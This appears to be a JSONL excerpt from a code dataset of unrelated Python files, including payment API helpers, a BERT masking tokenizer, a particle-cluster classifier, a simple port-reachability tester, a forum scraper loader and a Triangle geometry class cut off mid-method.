destinationid=destination,\n amount=amount,\n alternate_token=access_token,\n alternate_pin=pin,\n params={\n 'facilitatorAmount': float(get_fee(event, amount)),\n 'fundsSource': source,\n 'notes': \"Order {} for {}\".format(order.code, event.name),\n },\n )\n # Charge id returned by send_funds is the transaction ID\n # for the user; the event has a different transaction ID.\n # But we can use this one to get that one.\n\n event_charge = transactions.info(\n tid=str(user_charge_id),\n alternate_token=organization_access_token\n )\n\n return event_charge\n\n\ndef dwolla_refund(order, event, payment_id, amount, pin):\n \"\"\"\n Returns id of refund transaction.\n \"\"\"\n org_account = event.organization.get_dwolla_account(event.api_type)\n dwolla_prep(event.api_type)\n access_token = org_account.get_token()\n return transactions.refund(\n tid=int(payment_id),\n fundingsource=\"Balance\",\n amount=\"%.2f\" % amount,\n alternate_token=access_token,\n alternate_pin=int(pin),\n params={\n 'notes': \"Order {} for {}\".format(order.code, event.name),\n },\n )\n","sub_path":"brambling/payment/dwolla/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"445514318","text":"from typing import Dict\n\nfrom pyconsoleapp import ConsoleAppComponent\nfrom pyconsoleapp import menu_tools, parse_tools\n\nfrom pydiet.recipes import recipe_edit_service as res\nfrom pydiet import configs\n\n_TEMPLATE = '''Recipe Tags:\n------------------------\n{current_tags}\n(s) -- Save Changes\n(d*) -- Delete (where * = number)\n\nAdd Tags:\n{addable_tags}\n\n'''\n\nclass RecipeTagEditorComponent(ConsoleAppComponent):\n def __init__(self, app):\n super().__init__(app)\n self._res = res.RecipeEditService()\n self.set_option_response('s', self.on_save_changes)\n\n @property\n def current_tag_map(self) -> Dict[int, str]:\n return menu_tools.create_number_name_map(\n self._res.recipe.tags)\n\n @property\n def addable_tag_map(self) -> Dict[int, str]:\n # First build a list of all tags minus\n # those already added;\n addable_tags = configs.RECIPE_TAGS.copy()\n for tag in self._res.recipe.tags:\n if tag in addable_tags:\n addable_tags.remove(tag)\n # Turn it into numbered map;\n return menu_tools.create_number_name_map(addable_tags)\n\n def run(self):\n # If there is no recipe loaded;\n if not self._res.recipe:\n # Go back to the main recipe state;\n self.goto('home.recipes')\n\n def print(self):\n # First build the current tag list;\n current_tags = ''\n ## If there are tags assigned;\n if len(self._res.recipe.tags):\n # Grab a numbered list;\n tm = self.current_tag_map\n for key in tm.keys():\n current_tags = current_tags + '{} -- {}\\n'.format(\n key, tm[key])\n ## If there are no tags assigned;\n elif len(self._res.recipe.tags) == 0:\n current_tags = 'No tags assigned.\\n'\n # Build the available tag list;\n addable_tags = ''\n atm = self.addable_tag_map\n for key in atm.keys():\n addable_tags = addable_tags + '(a{}) -- {}\\n'.format(\n key, atm[key])\n # Return the main template;\n output = _TEMPLATE.format(\n current_tags=current_tags,\n addable_tags=addable_tags\n )\n output = self.app.fetch_component('standard_page_component').call_print(output)\n return output\n\n def on_save_changes(self):\n self._res.save_changes()\n\n def dynamic_response(self, raw_response: str) -> None:\n # Cache tag maps;\n atm = self.addable_tag_map\n ctm = self.current_tag_map\n # Try and parse the raw response into a single letter and integer;\n try:\n letter, integer = parse_tools.parse_letter_and_integer(raw_response)\n except parse_tools.LetterIntegerParseError:\n return\n # If we are adding a tag;\n if letter == 'a':\n # If the integer refers to an item on the addable tag list;\n if integer <= len(atm):\n # Add the referenced tag to the recipe;\n self._res.recipe.add_tag(atm[integer])\n # If we are deleting a tag;\n elif letter == 'd':\n # If the integer refers to an item on the current tag list;\n if integer <= len(ctm):\n # Delete the referenced tag from the recipe;\n self._res.recipe.remove_tag(ctm[integer])\n\n \n","sub_path":"pydiet/recipes/cli_components/old_components/recipe_tag_editor_component.py","file_name":"recipe_tag_editor_component.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"545863146","text":"\"\"\"This program changes the background color \nbetween red, green and blue\"\"\"\n\nimport pygame\n\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\nclass Game():\n \"\"\"Is the main game object.\"\"\"\n def __init__(self):\n pygame.init()\n self.color = BLACK\n self.screen = pygame.display.set_mode((640, 240))\n\n def run(self):\n \"\"\"Runs the main event loop.\"\"\"\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_r:\n self.color = pygame.Color('red')\n elif event.key == pygame.K_g:\n self.color = GREEN\n elif event.key == pygame.K_b:\n self.color = BLUE\n\n self.screen.fill(self.color)\n pygame.display.flip()\n\nif __name__ == '__main__':\n Game().run()","sub_path":"docs/tutorial1/intro4.py","file_name":"intro4.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"449916569","text":"class Solution(object):\n def convertToTitle(self, n):\n \"\"\"\n :type n: int\n :rtype: str\n \"\"\"\n if n<=0:\n return None;\n title=\"\"\n while(n>0):\n n=n-1\n c=chr(n%26+ord('A'))\n n=n/26\n title=title+c;\n return str(''.join(reversed(title)))\n","sub_path":"168. Excel Sheet Column Title.py","file_name":"168. Excel Sheet Column Title.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"647218652","text":"#!/usr/bin/env python\n# coding=utf-8\n# ================================================================\n# Copyright (C) 2019 Tuya NLP. All rights reserved.\n#\n# FileName:test.py\n# Author :rentc(桑榆)\n# DateTime:2021/4/22\n# Desc :\n#\n# ================================================================\n\nimport torch\nimport jieba\nfrom transformers import BertModel, BertConfig\nfrom transformers import BertTokenizer, BertForMaskedLM\nimport pdb\n\nclass MyTokenizer:\n def __init__(self, vocab_path):\n self.tokenizer = BertTokenizer(vocab_path,\n do_lower_case=True,\n do_basic_tokenize=True,\n never_split=None,\n unk_token=\"[UNK]\",\n sep_token=\"[SEP]\",\n pad_token=\"[PAD]\",\n cls_token=\"[CLS]\",\n mask_token=\"[MASK]\",\n tokenize_chinese_chars=False,\n strip_accents=None\n )\n\n def tokenize(self, word_list, p_mask:float, max_length=20, truncation=True, padding=True, islastone=False):\n inputs = self.tokenizer(word_list,\n return_tensors=\"pt\",\n truncation=truncation,\n padding=padding,\n max_length=max_length)\n #pdb.set_trace()\n if p_mask == 0:\n if islastone:\n inputs['input_ids'],labels = self.collate_fn2(inputs['input_ids'])\n else:\n labels = None\n else:\n inputs['input_ids'],labels = self.collate_fn(inputs['input_ids'], p_mask=p_mask)\n return inputs,labels\n # labels = tokenizer(\"The capital of France is Paris.\", return_tensors=\"pt\")[\"input_ids\"]\n \n def collate_fn(self, inputs, p_mask:float = 0.15):\n '''\n collate_fn 函数用来进一步校正数据,安装bert模型的mask原则作出masked的inputs与labels。\n 其中,inputs有15%的几率被mask,而所有的mask中,有80%的几率用'[mask]'进行替代,有10%用随机词进行替代,剩下10%保留原形\n '''\n labels = inputs.clone()\n #pdb.set_trace()\n \n # 特殊码标记,Bert.tokenizer特殊码指 '[UNK]','[CLS]','[PAD]','[SEP]','[MASK]'. 如果这个tag为特殊码,则为1,否则为0\n special_tokens_mask = [self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()] \n special_tokens_mask = torch.tensor(special_tokens_mask,dtype=torch.bool)\n probability_matrix = torch.full(labels.shape, p_mask)\n probability_matrix.masked_fill_(special_tokens_mask, value = 0.) 
# Special-token positions get probability 0, so special tokens are never masked\n masked_indices = torch.bernoulli(probability_matrix).bool()\n labels[~masked_indices] = -100\n indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices\n inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)\n indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced\n random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)\n inputs[indices_random] = random_words[indices_random]\n return inputs, labels\n def collate_fn2(self,inputs):\n labels = inputs.clone()\n maskid = [i-1 for val in labels.tolist() for i in range(len(val)) if val[i]==self.tokenizer.sep_token_id]\n for i in range(len(inputs)):\n ind = maskid[i]\n inputs[i][ind] = self.tokenizer.mask_token_id\n for i in range(len(labels)):\n for j in range(len(labels[i])):\n if j != maskid[i]:\n labels[i][j] = -100\n else:\n pass\n return inputs, labels\n \n \n \n \n\nif __name__ == '__main__':\n mt = MyTokenizer(\"../vocab/SougouBertVocab.txt\")\n sen = [' '.join(jieba.lcut('我也一度以为用制片人的钱是应该的')),' '.join(jieba.lcut('她毕业于金日成综合大学'))]\n #sen2 = jieba.lcut('她毕业于金日成综合大学')\n # pdb.set_trace()\n p,l = mt.tokenize(sen,p_mask=0,islastone = True)\n #p2,l2 = mt.tokenizer([' '.join(sen2)])\n print('Original: ', ' '.join(sen), '\nTokenized: ',p['input_ids'], '\nLabels: ',l )\n #print('\n')\n #print('Original: ', ' '.join(sen2), '\nTokenized: ',p2['input_ids'], '\nLabels: ',l2 )\n #print(p2)\n","sub_path":"tokenizer/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
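A quick way to sanity-check the 80/10/10 split that `collate_fn` implements is to rerun its three Bernoulli draws over many positions and look at the observed rates; a standalone sketch using plain torch, independent of the tokenizer:

import torch

torch.manual_seed(0)
n = 100000
# Step 1: select ~15% of positions for masking.
masked = torch.bernoulli(torch.full((n,), 0.15)).bool()
# Step 2: 80% of the selected positions become [MASK] ...
replaced = torch.bernoulli(torch.full((n,), 0.8)).bool() & masked
# Step 3: ... half of the remaining 20% (10% overall) become random tokens;
# whatever is left keeps its original id.
randomized = torch.bernoulli(torch.full((n,), 0.5)).bool() & masked & ~replaced
print(masked.float().mean().item())            # ~0.15
print((replaced.sum() / masked.sum()).item())  # ~0.80
print((randomized.sum() / masked.sum()).item())# ~0.10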
+{"seq_id":"502257495","text":"# A complete rewrite of the CERN@school particle recognition and classification algorithm,\n# for ease of integration with existing LUCID data and libraries.\n# Can be imported and called from anywhere to identify particle types based on their attributes\n# Author (code): Cal Hewitt, based on an algorithm from http://github.com/cernatschool/cluster-sorter\n\nimport numpy as np\nfrom scipy.optimize import leastsq\nimport json\nimport os\nfrom collections import OrderedDict\n\n# Load up the types file\ntypes = json.JSONDecoder(object_pairs_hook=OrderedDict).decode(open(os.path.dirname(os.path.realpath(__file__)) + \"/types.json\").read())\n# A list of bounds of properties of various particle types, adapted from http://github.com/cernatschool/cluster-sorter\n\n\ndef distance(point1, point2):\n # Simple 2D distance function using Pythagoras:\n # Calculates the distance between point1 (x, y) and point2 (x, y)\n return np.sqrt(((point2[0] - point1[0])**2) + ((point2[1] - point1[1])**2))\n\ndef point_line_distance(point, line):\n # Calculates the shortest distance between a point (x, y) and a line (m, c) where y = mx + c\n x, y = point\n m, c = line\n return np.fabs(m * x - y + c) / np.sqrt(1 + m**2)\n\ndef residuals(line, y, x):\n # Wrapper for point_line_distance in the format required by scipy's regression function\n return point_line_distance((x, y), line)\n\n\n# Stores and calculates the attributes of a single cluster ('blob') of pixels\nclass Blob:\n\n def __init__(self, pixels):\n self.pixels = pixels\n self.num_pixels = len(pixels)\n if not self.num_pixels:\n raise Exception(\"Cannot work on a blank cluster!\")\n # Calculate attributes\n self.radius, self.centroid = self.calculate_radius()\n self.squiggliness, self.best_fit_line = self.calculate_squiggliness()\n self.density = self.calculate_density()\n\n def calculate_radius(self):\n # Firstly, compute the centroid of the blob\n x_vals, y_vals = [], []\n for pixel in self.pixels:\n x_vals.append(pixel[0])\n y_vals.append(pixel[1])\n centroid = (np.mean(x_vals), np.mean(y_vals))\n # Loop through each pixel and check its distance from the centroid; set the radius to the highest of these\n radius = 0.0\n for pixel in self.pixels:\n dist = distance(centroid, pixel)\n if dist > radius:\n radius = dist\n return radius, centroid\n\n def calculate_squiggliness(self):\n # Split up into x and y value lists\n x_vals, y_vals = [], []\n for pixel in self.pixels:\n x_vals.append(pixel[0])\n y_vals.append(pixel[1])\n # Check if the blob is a straight line, so x_vals OR y_vals is made up of only one repeated element\n if x_vals.count(x_vals[0]) == len(x_vals) or y_vals.count(y_vals[0]) == len(y_vals):\n # Return a 0 squiggliness, as the blob is only one pixel, and a horizontal line as a best fit\n return 0, (0, 0)\n # Otherwise, use leastsq to estimate a line of best fit\n # As an initial guess, use a horizontal line passing through the first pixel\n first_guess_line = [0, y_vals[0]] # In the form [gradient, intercept]\n # Use scipy's regression function to magic this into a good LoBF\n best_fit_line = leastsq(residuals, first_guess_line, args = (np.array(y_vals), np.array(x_vals)))[0]\n # Find the mean distance from each pixel to the line (the 'squiggliness')\n distances = [point_line_distance(pixel, best_fit_line) for pixel in self.pixels]\n # Return both a squiggliness value and the parameters of the linear LoBF\n return np.mean(distances), best_fit_line\n\n def calculate_density(self):\n # Calculate the fill by hit 
pixels of a circle of the blob's radius around the centroid\n # This can be >1 as the blob's radius passes through the centre of outer pixels rather than around them\n # Firstly, compute the area of the enclosing circle\n circle_area = np.pi*((self.radius)**2)\n if circle_area == 0:\n # If the blob is only one pixel in size, and so has a radius of 0, it is fully dense\n return 1\n else:\n # Divide the number of pixels in the blob by this\n return self.num_pixels / circle_area\n\n def classify(self):\n # Set up a dictionary of the blob's own values\n blob_values = {\"num_pixels\": self.num_pixels,\n \"radius\": self.radius,\n \"density\": self.density,\n \"squiggliness\": self.squiggliness}\n # Loop through each potential particle type, looking for a match\n for particle_name, subtypes in types.items():\n for name, properties in subtypes.items():\n # Initially, presume the particle is a match\n match = True\n # Check through each property, in the form {name: (lower_bound, upper_bound)}\n for property_name, property_value in properties.items():\n # If the blob's properties lie outside the bounds specified in the types file, the blob is not a match\n if (blob_values[property_name] < property_value[0]) or (blob_values[property_name] > property_value[1]):\n match = False\n # If the current particle matches the attributes of the blob, then return its name\n if match:\n return particle_name\n # By this point, all potential particles have been checked, so the blob must be something else\n return \"other\"\n\n\ndef classify(blob):\n # A quick wrapper method for ease of use\n b = Blob(blob)\n return b.classify()\n\ndef classify_multiple(blobs):\n classifications = []\n for blob in blobs:\n classifications.append(classify(blob))\n return classifications\n\ndef classify_masked(blob):\n # Method for early LUCID data where half of pixels are masked:\n b = Blob(blob)\n b.num_pixels *= 2\n b.density *= 2\n return b.classify()\n","sub_path":"classification/old_algorithm/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
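The squiggliness metric above is the mean perpendicular distance from each pixel to the least-squares line, using |mx - y + c| / sqrt(1 + m^2). A standalone check of that formula against a case that is easy to do by hand:

import math

def point_line_distance(point, line):
    # line is (m, c) for y = mx + c, matching the record's representation.
    x, y = point
    m, c = line
    return abs(m * x - y + c) / math.sqrt(1 + m ** 2)

# Distance from (0, 1) to the line y = x is 1/sqrt(2).
assert math.isclose(point_line_distance((0, 1), (1, 0)), 1 / math.sqrt(2))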
+{"seq_id":"557356436","text":"import socket\n\nIP = 'x.x.x.x'\nDEBUG = True\nports = [21, 22, 53, 25, 111, 443, 8443, 80, 8889, 10000, 21050, 48000, 48001, 14000]\nsocket.setdefaulttimeout(5)\n\nprint('Testing UDP')\n# UDP\nfor port in ports:\n try:\n sock = socket.socket(socket.AF_INET, # Internet\n socket.SOCK_DGRAM) # UDP\n message = 'UDP %d' % port\n sock.sendto(message.encode(), (IP, port))\n except Exception as e:\n print(e)\n\n# TCP\nprint('Testing TCP')\nfor port in ports:\n try:\n sock = socket.socket(socket.AF_INET, # Internet\n socket.SOCK_STREAM) # TCP\n sock.connect((IP, port))\n message = 'TCP %d' % port\n sock.send(message.encode())\n print('Port %d working' % port)\n except socket.timeout:\n if DEBUG:\n print('Port %d timeout' % port)\n pass\n except Exception as e:\n print(e)\n","sub_path":"misc/test_sockets_client.py","file_name":"test_sockets_client.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"348742947","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n ptr = head\n length = 0\n while ptr != None:\n ptr = ptr.next\n length += 1\n if length <= 1:\n return True\n half = length / 2\n count = 1\n newHead = head\n nptr = head.next\n head.next = None\n while count < half:\n pptr = nptr\n nptr = nptr.next\n pptr.next = newHead\n newHead = pptr\n count += 1\n if length % 2 != 0:\n nptr = nptr.next\n ptr1 = newHead\n ptr2 = nptr\n while ptr1 != None:\n if ptr1.val != ptr2.val:\n return False\n ptr1 = ptr1.next\n ptr2 = ptr2.next\n return True\n \n","sub_path":"234_Palindrome_Linked_List.py","file_name":"234_Palindrome_Linked_List.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"373177513","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/7/12\n# @Author : Zou Yutao\n# @File : dataUtils.py\n\n\"\"\"\n封装数据生成相关关键字\n\"\"\"\n\nimport uuid\nimport string\nimport random\nimport time\nimport datetime\n\n\ndef rand_uuid():\n\n \"\"\"随机产生一个32位的uuid\n - :return: 返回uuid\n \"\"\"\n temp = str(uuid.uuid1())\n return temp.replace(\"-\", \"\")\n\n\ndef rand_name(prefix=None, length=5):\n \"\"\"产生随机名字\n\n - :param prefix: 【选填】名字的前缀,可选值,类型:string\n - :param length: 【选填】名字的后缀的长度,类型:int\n - :return: 返回随机名字\n \"\"\"\n rand_str = \"\".join(random.sample(string.digits, int(length)))\n str1_temp = rand_str if not prefix else prefix + rand_str\n return str1_temp\n\n\ndef rand_str(length):\n \"\"\"随机产生指定长度的字符串\n\n - :param length: 【必填】字符串长度,类型:int\n - :return: 返回字符串\n \"\"\"\n\n char = string.ascii_letters + string.digits + string.punctuation\n rand_str1 = \"\".join(random.choice(char) for x in range(int(length)))\n return rand_str1\n\n\ndef get_time_stamp():\n \"\"\"获取时间戳\n\n - :return:返回时间戳\n \"\"\"\n temp_time = str(int(time.time()*1000))\n return temp_time\n\n\ndef get_time_stamp_formatted(formatter=\"%Y-%m-%d %H:%M:%S\"):\n \"\"\"获取g格式化后的时间戳\n\n - :return:返回格式化后的时间戳\n \"\"\"\n temp_time = time.strftime(formatter, time.localtime(time.time()))\n return temp_time\n\n\ndef time_delta(days=0, seconds=0, microseconds=0, milliseconds=0, minutes=0, hours=0, weeks=0):\n \"\"\"在当前时间基础上进行时间增减操作\n\n - :param days: 【可选】单位:天;类型:整数\n - :param seconds: 【可选】单位:秒;类型:整数\n - :param microseconds: 【可选】单位:毫秒;类型:整数\n - :param milliseconds: 【可选】单位:千毫秒;类型:整数\n - :param minutes:【可选】单位:分钟;类型:整数\n - :param hours:【可选】单位:小时;类型:整数\n - :param weeks:【可选】单位:周;类型:整数\n - :return: 返回格式化后的时间\n\n - 举例:\n | Time Delta | days=5 |\n \"\"\"\n # 获取当前时间\n now = datetime.datetime.now()\n # 当前时间加上半小时\n add_time = now + datetime.timedelta(days=days, seconds=seconds, microseconds=microseconds, milliseconds=milliseconds,\n minutes=minutes, hours=hours, weeks=weeks)\n # 格式化字符串输出\n formatted_time = add_time.strftime('%Y-%m-%d %H:%M:%S')\n return formatted_time\n\n\ndef random_chn(length):\n \"\"\"随机生成中文字符串\n\n - :param length: 【必填】指定中文字符串的长度\n - :return: 返回生成的字符串\n \"\"\"\n list1 = [\"一\", \"汽\", \"大\", \"众\", \"迈\", \"腾\", \"高\", \"尔\", \"夫\", \"探\", \"歌\", \"岳\", \"宝\", \"来\", \"速\",\"捷\",\"达\"]\n result = \"\"\n for i in range(int(length)):\n result += random.choice(list1)\n return result\n\n\ndef random_eng(length):\n \"\"\"随机生成英文字符串\n\n - :param length: 【必填】指定英文字符串的长度\n - :return: 返回生成的字符串\n \"\"\"\n result = \"\"\n for i in range(int(length)):\n s = chr(random.randint(65, 90))\n result += s\n return result\n\n\nif __name__ == \"__main__\":\n a = time_delta(days=-5)\n print (a)\n\n\n\n","sub_path":"OneAPPCommonLib/dataUtils.py","file_name":"dataUtils.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"107548309","text":"import spynnaker.pyNN as sim\nfrom spynnaker_external_devices_plugin.pyNN.connections.\\\n spynnaker_live_spikes_connection import SpynnakerLiveSpikesConnection\nimport spynnaker_external_devices_plugin.pyNN as ex\nimport spinn_breakout\nimport pylab as plt\n\nfrom vision.sim_tools.connectors.standard_connectors import breakout_one2one\n\nfrom vision.retina import Retina, dvs_modes, MERGED\n# from vision.lgn import LGN\n\nburst_params = {'a': 0.02, 'b': 0.25, 'c': -55.0, 'd': 0.05, \n 'v_init': -64., 'u_init': -0.25*64}\n\nTESTING = True\n# TESTING = False\n\n# Game resolution, coords layout in packet\nif TESTING:\n X_RESOLUTION = 40\n Y_RESOLUTION = 32\n X_BITS = 8\n Y_BITS = 8\n N_NEURON = 2\nelse:\n X_RESOLUTION = 160\n Y_RESOLUTION = 128\n X_BITS = 8\n Y_BITS = 8\n N_NEURON = 1\n\n# UDP port to read spikes from\nUDP_PORT = 19993#17893\n\n# Setup pyNN simulation\nsim.setup(timestep=1.0)\n\n#\n#\n########################################################################\n# B R E A K O U T\n########################################################################\n\n# Create breakout population and activate live output for it\nbreakout_pop = sim.Population(N_NEURON, spinn_breakout.Breakout, {}, label=\"breakout\")\nex.activate_live_output_for(breakout_pop, host=\"0.0.0.0\", port=UDP_PORT)\n\n# Create spike injector to inject keyboard input into simulation\nkey_input = sim.Population(2, ex.SpikeInjector, {\"port\": 12367}, label=\"key_input\")\nkey_input_connection = SpynnakerLiveSpikesConnection(send_labels=[\"key_input\"])\n\n# Connect key spike injector to breakout population\nsim.Projection(key_input, breakout_pop, sim.OneToOneConnector(weights=2))\n\n# Create visualiser\nvisualiser = spinn_breakout.Visualiser(\n UDP_PORT, key_input_connection,\n x_res=X_RESOLUTION, y_res=Y_RESOLUTION,\n x_bits=X_BITS, y_bits=Y_BITS)\n\n#\n#\n########################################################################\n# I N T E R M E D I A T E B U R S T I N G\n########################################################################\n\ninter_pop = sim.Population(X_RESOLUTION*Y_RESOLUTION, sim.IZK_curr_exp, \n burst_params, label='relay')\ninter_pop.record()\n \no2o_bko = sim.FromListConnector( breakout_one2one(X_RESOLUTION, Y_RESOLUTION,\n X_BITS, weights=10.) )\nbrk2intr = sim.Projection(breakout_pop, inter_pop, o2o_bko)\n\n# ex.activate_live_output_for(inter_pop, host=\"0.0.0.0\", port=UDP_PORT)\n#\n#\n########################################################################\n# R E T I N A\n########################################################################\n\n\n# retina = Retina(sim, breakout_pop, X_RESOLUTION, Y_RESOLUTION, \n # dvs_modes[MERGED])\n\n# Run simulation (non-blocking)\n# sim.run(None)\nsim.run(17000)\n\n# Show visualiser (blocking)\n# visualiser.show()\nspks = inter_pop.getSpikes(compatible_output=True)\n# print(spks)\n\n# End simulation\nsim.end()\n\nfig = plt.figure()\nax = plt.subplot(1, 1, 1)\nts = [st for (nid, st) in spks]\nni = [nid for (nid, st) in spks]\nplt.plot(ts, ni, '.')\nplt.show()\n\n","sub_path":"BreakOut/test_retina.py","file_name":"test_retina.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"643957650","text":"from incels_co_utils import build_index, get_thread\nfrom tsfresh import extract_features\nfrom utils import get_thread_global, initialize_worker, get_html_session\nfrom multiprocessing import Pool\nimport pandas as pd\nimport argparse\nimport os\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(\n description=\"\"\"This script downloads the incels.is forum\"\"\")\n\n parser.add_argument(\"--dst\", dest=\"dst\", type=str, default=\"./data/forums/incels/\",\n help=\"Location to save the forum.\")\n\n parser.add_argument(\"--index\", dest=\"index\", type=str, default=\"./data/forums/incels/index.csv\",\n help=\"Location of index file.\")\n\n parser.add_argument(\"--build_index\", dest=\"build_index\", action=\"store_true\",\n help=\"If true, builds index, otherwise gets posts.\")\n\n parser.add_argument(\"--update\", dest=\"build_index\", action=\"store_true\",\n help=\"If true, rebuilds index and gets different posts.\")\n\n parser.add_argument(\"--nump\", dest=\"nump\", type=int, default=15,\n help=\"Number of simultaneous processes.\")\n\n parser.add_argument(\"--debug\", dest=\"debug\", action=\"store_true\",\n help=\"Runs w/o multiprocessing for debugging.\")\n\n args = parser.parse_args()\n\n os.makedirs(args.dst, exist_ok=True)\n\n # Build index \n if args.build_index:\n build_index(None, args.index, args.nump)\n \n # Get data posts\n else:\n to_run = list(pd.read_csv(args.index)[\"link\"].values)\n to_run = list(zip([get_thread]*len(to_run), to_run))\n if args.debug:\n get_html_session = get_html_session()\n for f, thread in to_run:\n f(thread, get_html_session)\n else:\n p = Pool(args.nump, initializer=initialize_worker)\n p.starmap(get_thread_global, to_run)\n","sub_path":"forums_tools/incels_co_loader.py","file_name":"incels_co_loader.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"219203938","text":"import sys\nfrom offline_scheduler.source.strategy import Strategy\nfrom offline_scheduler.source.nodes import SharedInfo\n\n\nclass CostStrategy(Strategy):\n\n def __init__(self, runDate):\n self.normalize(runDate)\n\n def normalize(self, runDate):\n unitPrice = [node.unitPrice for node in SharedInfo.bigNodes]\n ma = max(unitPrice)\n mi = min(unitPrice)\n for node in SharedInfo.bigNodes:\n node.unitPrice = (ma - node.unitPrice) / (ma - mi)\n\n def normalizedScore(self, fromNode, endNode, hour):\n for node in SharedInfo.bigNodes:\n if node.name == endNode:\n return node.unitPrice\n return 0\n\nif __name__ == '__main__':\n a = CostStrategy(sys.argv[1])\n a.normalizedScore(sys.argv[1])\n","sub_path":"offline_scheduler/source/costStrategy.py","file_name":"costStrategy.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"533872468","text":"''' a pythonic Triangle\n'''\n\nimport math\nfrom .point import Point\nfrom .line import Segment\nfrom .exceptions import *\n\nclass Triangle(object):\n '''a pythonic Triangle\n\n Implements a Triangle object in the XY plane having three\n non-coincident vertices and three intersecting edges.\n\n Vertices are labeled 'A', 'B' and 'C'.\n Edges are labeled 'AB', 'BC' and 'AC'.\n\n The length of each edge is labeled 'ab', 'bc' and 'ac'.\n\n Angles in radians are labeled:\n 'alpha' for CAB\n 'beta' for ABC\n 'gamma' for BCA\n\n Usage:\n\n >>> a = Triangle()\n >>> b = Triangle(A,B,C)\n >>> c = Triangle([p,q,r])\n >>> d = Triangle([x,y,z],[x,y,z],[x,y,z])\n >>> e = Triangle(A=p0,B=p1,C=p2)\n '''\n \n vertexNames = 'ABC'\n vertexNameA = vertexNames[0]\n vertexNameB = vertexNames[1]\n vertexNameC = vertexNames[2]\n edgeNames = [vertexNameA+vertexNameB,\n vertexNameB+vertexNameC,\n vertexNameA+vertexNameC]\n edgeNameAB = edgeNames[0]\n edgeNameBC = edgeNames[1]\n edgeNameAC = edgeNames[2]\n \n @classmethod\n def randomXY(cls,origin=None,radius=1):\n '''\n :param: radius - float\n :param: origin - optional Point subclass\n :return: Triangle\n\n Creates a triangle with random coordinates in the circle\n described by (origin,radius). If origin is unspecified, (0,0)\n is assumed.\n '''\n \n pts = set()\n while len(pts) < 3:\n p = Point.randomXY(origin,radius)\n pts.add(p)\n \n return cls(pts)\n\n @classmethod\n def unit(cls):\n '''\n XXX missing doc string\n '''\n return cls(Point.units())\n \n def __init__(self,*args,**kwds):\n \n if len(args) == 0 and len(kwds) == 0:\n return\n\n if len(args) == 1:\n self.ABC = args[0]\n else:\n self.ABC = args\n\n for name in self.vertexNames:\n try:\n setattr(self,name,kwds[name])\n except:\n pass\n \n @property\n def A(self):\n '''\n Vertex of triangle, Point subclass.\n '''\n try:\n return self._A\n except AttributeError:\n pass\n self._A = Point()\n return self._A\n\n @A.setter\n def A(self,newValue):\n self.A.xyz = newValue\n\n @property\n def B(self):\n '''\n Vertex of triangle, Point subclass.\n '''\n try:\n return self._B\n except AttributeError:\n pass\n self._B = Point(1,0)\n return self._B\n \n @B.setter\n def B(self,newValue):\n self.B.xyz = newValue\n \n @property\n def C(self):\n '''\n Vertex of triangle, Point subclass.\n '''\n try:\n return self._C\n except AttributeError:\n pass\n self._C = Point(0,1)\n return self._C\n\n @C.setter\n def C(self,newValue):\n self.C.xyz = newValue\n \n @property\n def ABC(self):\n '''\n A list of the triangle's vertices, list.\n '''\n return [self.A,self.B,self.C]\n \n @ABC.setter\n def ABC(self,iterable):\n self.A,self.B,self.C = iterable\n \n @property\n def AB(self):\n '''\n Line segment with endpoints A and B, Segment subclass.\n '''\n return Segment(self.A,self.B)\n\n @property\n def AC(self):\n '''\n Line segment with endpoints A and C, Segment subclass.\n '''\n return Segment(self.A,self.C)\n\n @property\n def BC(self):\n '''\n Line segment with endpoints B and C, Segment subclass.\n '''\n return Segment(self.B,self.C)\n\n @property\n def vertices(self):\n '''\n Alias for property \"ABC\", list.\n '''\n return self.ABC\n \n @property\n def sides(self):\n '''\n List of line segments, list.\n\n '''\n return [self.AB,self.BC,self.AC]\n\n @property\n def hypotenuse(self):\n '''\n The longest side of the triangle.\n\n '''\n s = self.sides\n 